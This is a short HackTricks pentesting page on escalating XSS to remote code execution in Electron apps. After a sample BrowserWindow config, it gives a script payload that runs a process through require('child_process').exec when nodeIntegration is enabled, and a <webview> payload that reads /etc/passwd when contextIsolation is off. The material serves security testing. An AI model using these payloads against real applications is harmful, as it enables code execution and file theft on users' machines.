HackTricks
Search…
Pentesting
Powered By GitBook
XSS to RCE Electron Desktop Apps
When I test Electron app, first I always check the options of the BrowserWindow API, which is used to create a browser window. By checking it, I think about how RCE can be achieved when arbitrary JavaScript execution on the renderer is possible. Example:
1
const mainWindowOptions = {
2
title: 'Discord',
3
backgroundColor: getBackgroundColor(),
4
width: DEFAULT_WIDTH,
5
height: DEFAULT_HEIGHT,
6
minWidth: MIN_WIDTH,
7
minHeight: MIN_HEIGHT,
8
transparent: false,
9
frame: false,
10
resizable: true,
11
show: isVisible,
12
webPreferences: {
13
blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
14
nodeIntegration: false,
15
preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
16
nativeWindowOpen: true,
17
enableRemoteModule: false,
18
spellcheck: true
19
}
20
};
Copied!

nodeIntgration RCE

If the nodeIntegration is set to true, a web page's JavaScript can use Node.js features easily just by calling the require(). For example, the way to execute the calc application on Windows is:
1
<script>
2
require('child_process').exec('calc');
3
</script>
Copied!

Read Arbitrary Internal FIle

If contextIsolation set to false you can try to use <webview> (similar to <iframe> butcan load local files) to read local files and exfiltrate them: using something like <webview src=”file:///etc/passwd”></webview>:
(Trick copied form here).
Last modified 8mo ago